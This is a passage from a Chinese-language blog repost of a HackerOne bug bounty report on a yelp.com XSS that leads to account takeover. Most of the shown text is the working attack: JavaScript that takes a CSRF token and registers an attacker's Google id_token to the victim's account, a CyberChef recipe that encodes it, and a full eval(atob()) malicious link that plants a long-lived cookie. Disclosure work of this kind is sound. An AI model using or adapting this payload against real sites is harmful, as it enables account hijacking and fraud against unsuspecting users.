a.<span class="title function_">open</span>(<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;https://www.yelp.dk/profile_sharing&#x27;</span>);</span><br><span class="line">  a.<span class="title function_">send</span>();</span><br><span class="line">&#125;)();</span><br></pre></td></tr></table></figure>

<p>同样，我们使用这个 CyberChef 食谱来创建一个链接，感染受害者：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://gchq.github.io/CyberChef/#recipe=JavaScript_Minify()To_Base64(&#x27;A-Za-z0-9%2B/%3D&#x27;)Find_/_Replace(%7B&#x27;option&#x27;:&#x27;Regex&#x27;,&#x27;string&#x27;:&#x27;%5E&#x27;%7D,&#x27;asdf%20guvo%3D%3C/script%3E%3Cscript%3Eeval(atob(%5C&#x27;&#x27;,true,false,true,false)Find_/_Replace(%7B&#x27;option&#x27;:&#x27;Regex&#x27;,&#x27;string&#x27;:&#x27;$&#x27;%7D,&#x27;%5C&#x27;))//;Max-Age%3D99999999&#x27;,true,false,true,false)URL_Encode(true)Find_/_Replace(%7B&#x27;option&#x27;:&#x27;Regex&#x27;,&#x27;string&#x27;:&#x27;%5E&#x27;%7D,&#x27;https://yelp.com/?canary%3D&#x27;,true,false,true,false)&amp;input=KGZ1bmN0aW9uIGYoKSB7CiAgYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwogIGEuYWRkRXZlbnRMaXN0ZW5lcignbG9hZCcsIGZ1bmN0aW9uICgpIHsKICAgIHJ4ID0gLyJHb29nbGVDb25uZWN0IjogIihbXiJdKikvOwogICAgaWRfdG9rZW4gPSAiZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWkNJNklqWXdPRE5rWkRVNU9ERTJOek5tTmpZeFptUmxPV1JoWlRZME5tSTJaakF6T0RCaE1ERTBOV01pTENKMGVYQWlPaUpLVjFRaWZRLmV5SnBjM01pT2lKb2RIUndjem92TDJGalkyOTFiblJ6TG1kdmIyZHNaUzVqYjIwaUxDSnVZbVlpT2pFMk9EVTNNVEF4TmpFc0ltRjFaQ0k2SWpZNU9UWTVNVGc1TlRjeE1TMTJiVEpyT0dWbllqTXlOMmh4TTJ3d1lUZGpjbk5xTUc4eWJ6bHNaVzQyTVM1aGNIQnpMbWR2YjJkc1pYVnpaWEpqYjI1MFpXNTBMbU52YlNJc0luTjFZaUk2SWpFd05EQTBNVEExTXpreU1qUTVORFkzTWpFeE55SXNJbVZ0WVdsc0lqb2laRzl2WkdGa2RXZDFZMEJuYldGcGJDNWpiMjBpTENKbGJXRnBiRjkyWlhKcFptbGxaQ0k2ZEhKMVpTd2lZWHB3SWpvaU5qazVOamt4T0RrMU56RXhMWFp0TW1zNFpXZGlNekkzYUhFemJEQmhOMk55YzJvd2J6SnZPV3hsYmpZeExtRndjSE11WjI5dloyeGxkWE5sY21OdmJuUmxiblF1WTI5dElpd2libUZ0WlNJNklrUmhaR1VnVFhWeWNHaDVJaXdpY0dsamRIVnlaU0k2SW1oMGRIQnpPaTh2YkdnekxtZHZiMmRzWlhWelpYSmpiMjUwWlc1MExtTnZiUzloTDBGQlkwaFVkR1pHVmxSRlNVNWZjM1ZWVjAxQ1RtcGpTR0ZFV0hnM1RESmxiSEZRTVRWd05HaExha3N4UFhNNU5pMWpJaXdpWjJsMlpXNWZibUZ0WlNJNklrUmhaR1VpTENKbVlXMXBiSGxmYm1GdFpTSTZJazExY25Cb2VTSXNJbWxoZENJNk1UWTROVGN4TURRMk1Td2laWGh3SWpveE5qZzFOekUwTURZeExDSnFkR2tpT2lKbU56WXlaRFpsWmpFeVptRmtOakk1WW1FNFlUWTVPR0ZoTUROaE1HTTNOelU0TXpZd1lXVXhJbjAuSy1YY2FBQlZoVXYtV21jcEhMQ0VhRGs1cmVZV0gwN0FiMVFrVXhoYUdiTlFZenQxNFZpUG0yeWJpSWdKVUtoeXV3Snp6QWpsbEp2dHJWMl9OclVablEwdkFfdjdQdUtPOUdRVmg3Mm5ZeDVzV242TGpNc3VXTGg1ZDI0VmstUnkxQ3FDX3hzMmpFZWgwM2Vtc1otMUdoYV8tQUJ3bGJDREg1eXFlZXBOa2gyRWFZWjdjS1ZzVVV4bklqcFhLck83eFM3elA3YUJ5dDBtSEExZ1VTZWktNGFhbF9QVks0eklHYTJHeXZMQ1RRM2Zxc2VEejdGQ3JRWU8tM0gtVks5TzJOaUJZWmN6YnpfdkxvUlF0QVNlUmdiajVqUVV0RURqZnpLOE1UVmd2V1BWajNFWnZ0NEJiZDBjcF9vRm1wTDFXak15QjltVHRPS0JTTTNEYVdkTE5nIjsKICAgIGIgPSByeC5leGVjKHRoaXMucmVzcG9uc2VUZXh0KTsKICAgIGZldGNoKCJodHRwczovL3d3dy55ZWxwLmRrL2dvb2dsZV9jb25uZWN0L3JlZ2lzdGVyIiwgeyJtZXRob2QiOiAiUE9TVCIsICJib2R5IjogbmV3IFVSTFNlYXJjaFBhcmFtcyh7ImlkX3Rva2VuIjogaWRfdG9rZW4sICJjc3JmdG9rIjogYlsxXX0pfSkKICB9KTsKICBhLm9wZW4oJ0dFVCcsICdodHRwczovL3d3dy55ZWxwLmRrL3Byb2ZpbGVfc2hhcmluZycpOwogIGEuc2VuZCgpOwp9KSgpOw</span><br></pre></td></tr></table></figure>

<p>最终的链接如下所示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://yelp.com/?canary=asdf%20guvo%3D%3C%2Fscript%3E%3Cscript%3Eeval%28atob%28%27YT1uZXcgWE1MSHR0cFJlcXVlc3QsYS5hZGRFdmVudExpc3RlbmVyKCJsb2FkIiwoZnVuY3Rpb24oKXtyeD0vIkdvb2dsZUNvbm5lY3QiOiAiKFteIl0qKS8saWRfdG9rZW49ImV5SmhiR2NpT2lKU1V6STFOaUlzSW10cFpDSTZJall3T0ROa1pEVTVPREUyTnpObU5qWXhabVJsT1dSaFpUWTBObUkyWmpBek9EQmhNREUwTldNaUxDSjBlWEFpT2lKS1YxUWlmUS5leUpwYzNNaU9pSm9kSFJ3Y3pvdkwyRmpZMjkxYm5SekxtZHZiMmRzWlM1amIyMGlMQ0p1WW1ZaU9qRTJPRFUzTVRBeE5qRXNJbUYxWkNJNklqWTVPVFk1TVRnNU5UY3hNUzEyYlRKck9HVm5Zak15TjJoeE0yd3dZVGRqY25OcU1HOHliemxzWlc0Mk1TNWhjSEJ6TG1kdmIyZHNaWFZ6WlhKamIyNTBaVzUwTG1OdmJTSXNJbk4xWWlJNklqRXdOREEwTVRBMU16a3lNalE1TkRZM01qRXhOeUlzSW1WdFlXbHNJam9pWkc5dlpHRmtkV2QxWTBCbmJXRnBiQzVqYjIwaUxDSmxiV0ZwYkY5MlpYSnBabWxsWkNJNmRISjFaU3dpWVhwd0lqb2lOams1TmpreE9EazFOekV4TFhadE1tczRaV2RpTXpJM2FIRXpiREJoTjJOeWMyb3diekp2T1d4bGJqWXhMbUZ3Y0hNdVoyOXZaMnhsZFhObGNtTnZiblJsYm5RdVkyOXRJaXdpYm1GdFpTSTZJa1JoWkdVZ1RYVnljR2g1SWl3aWNHbGpkSFZ5WlNJNkltaDBkSEJ6T2k4dmJHZ3pMbWR2YjJkc1pYVnpaWEpqYjI1MFpXNTBMbU52YlM5aEwwRkJZMGhVZEdaR1ZsUkZTVTVmYzNWVlYwMUNUbXBqU0dGRVdIZzNUREpsYkhGUU1UVndOR2hMYWtzeFBYTTVOaTFqSWl3aVoybDJaVzVmYm1GdFpTSTZJa1JoWkdVaUxDSm1ZVzFwYkhsZmJtRnRaU0k2SWsxMWNuQm9lU0lzSW1saGRDSTZNVFk0TlRjeE1EUTJNU3dpWlhod0lqb3hOamcxTnpFME1EWXhMQ0pxZEdraU9pSm1Oell5WkRabFpqRXlabUZrTmpJNVltRTRZVFk1T0dGaE1ETmhNR00zTnpVNE16WXdZV1V4SW4wLkstWGNhQUJWaFV2LVdtY3BITENFYURrNXJlWVdIMDdBYjFRa1V4aGFHYk5RWXp0MTRWaVBtMnliaUlnSlVLaHl1d0p6ekFqbGxKdnRyVjJfTnJVWm5RMHZBX3Y3UHVLTzlHUVZoNzJuWXg1c1duNkxqTXN1V0xoNWQyNFZrLVJ5MUNxQ194czJqRWVoMDNlbXNaLTFHaGFfLUFCd2xiQ0RINXlxZWVwTmtoMkVhWVo3Y0tWc1VVeG5JanBYS3JPN3hTN3pQN2FCeXQwbUhBMWdVU2VpLTRhYWxfUFZLNHpJR2EyR3l2TENUUTNmcXNlRHo3RkNyUVlPLTNILVZLOU8yTmlCWVpjemJ6X3ZMb1JRdEFTZVJnYmo1alFVdEVEamZ6SzhNVFZndldQVmozRVp2dDRCYmQwY3Bfb0ZtcEwxV2pNeUI5bVR0T0tCU00zRGFXZExOZyIsYj1yeC5leGVjKHRoaXMucmVzcG9uc2VUZXh0KSxmZXRjaCgiaHR0cHM6Ly93d3cueWVscC5kay9nb29nbGVfY29ubmVjdC9yZWdpc3RlciIse21ldGhvZDoiUE9TVCIsYm9keTpuZXcgVVJMU2VhcmNoUGFyYW1zKHtpZF90b2tlbjppZF90b2tlbixjc3JmdG9rOmJbMV19KX0pfSkpLGEub3BlbigiR0VUIiwiaHR0cHM6Ly93d3cueWVscC5kay9wcm9maWxlX3NoYXJpbmciKSxhLnNlbmQoKTs%3D%27%29%29%2F%2F%3BMax%2DAge%3D99999999</span><br></pre></td></tr></table></figure>

<p>这个视频展示了攻击过程。左侧是受害者，右侧是攻击者。受害者已经登录到他们的 Yelp 账户。然后，他退出登录，在某个时间点访问了我们恶意的链接。当受害者在以后的某个时间点再次登录他的 Yelp 账户时，我们的载荷触发，将我们的 Google 账户 <a href="mailto:doodaduguc@gmail.com">doodaduguc@gmail.com</a> 链接到了受害者的账户。攻击者现在可以使用 Google 账户登录，并进入受害者的账户。</p>
<p>视频：<a target="_blank" rel="noopener" href="https://github.com/Bealee008/Hackerone_video/blob/main/google-link-ato-poc2.mp4">https://github.com/Bealee008/Hackerone_video/blob/main/google-link-ato-poc2.mp4</a></p>
<h2 id="影响"><a href="#影响" class="headerlink" title="影响"></a>影响</h2><p>这种攻击可以完全威胁到 Yelp.com 上的商业账户，并在普通账户上进行账户接管。由于 cookie 不会过期，受害者只需要在某个时间点访问我们的链接，当他们稍后尝试登录 yelp.com 时，就会受到威胁。这个链接可以通过 Yelp 论坛、评论或私信传播给其他用户，从而轻松地针对其他 Yelp 用户进行攻击。</p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/happy/">Happy</a></li>
         
          <li><a href="/tag/">Tag</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/kpi/">Kpi</a></li>
         
          <li><a href="/about/">About</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">1.</span> <span class="toc-text">总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%8F%E8%BF%B0"><span class="toc-number">2.</span> <span class="toc-text">描述</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E2%80%9Dguvo%E2%80%9D-cookie-%E8%BF%9B%E8%A1%8C%E7%9A%84XSS%E6%94%BB%E5%87%BB"><span class="toc-number">2.1.</span> <span class="toc-text">通过”guvo” cookie 进行的XSS攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%BE%E7%BD%AE-%E2%80%9Cyelpmainpaastacanary%E2%80%9D-cookie"><span class="toc-number">2.2.</span> <span class="toc-text">设置 “yelpmainpaastacanary” cookie</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8D%9F%E5%9D%8F%E7%9A%84-cookie-%E8%A7%A3%E6%9E%90%E5%92%8C-cookie-%E8%B5%B0%E7%A7%81"><span class="toc-number">2.3.</span> <span class="toc-text">损坏的 cookie 解析和 cookie 走私</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#POCs"><span class="toc-number">2.4.</span> <span class="toc-text">POCs</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9C%A8-biz-yelp-com-x2F-login-%E4%B8%8A%E7%9A%84%E9%94%AE%E7%9B%98%E8%AE%B0%E5%BD%95%E5%99%A8"><span class="toc-number">2.5.</span> <span class="toc-text">在 biz.yelp.com&#x2F;login 上的键盘记录器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E9%93%BE%E6%8E%A5-Google-%E8%B4%A6%E6%88%B7%E5%AE%9E%E7%8E%B0%E8%B4%A6%E6%88%B7%E6%8E%A5%E7%AE%A1"><span class="toc-number">2.6.</span> <span class="toc-text">通过链接 Google 账户实现账户接管</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D"><span class="toc-number">3.</span> <span class="toc-text">影响</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&text=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&title=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&is_video=false&description=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）&body=Check out this article: https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&title=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&title=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&title=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&title=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&name=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&t=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">

  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    Bealee
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
      --><li><a href="/">Home</a></li><!--
    --><!--
      --><li><a href="/archives/">Writing</a></li><!--
    --><!--
      --><li><a href="/happy/">Happy</a></li><!--
    --><!--
      --><li><a href="/tag/">Tag</a></li><!--
    --><!--
      --><li><a href="/search/">Search</a></li><!--
    --><!--
      --><li><a href="/kpi/">Kpi</a></li><!--
    --><!--
      --><li><a href="/about/">About</a></li><!--
    -->
      </ul>
      <ul>
        
      </ul>
    </nav>
  </div>

    
    
</footer>


    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'cactus-1';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
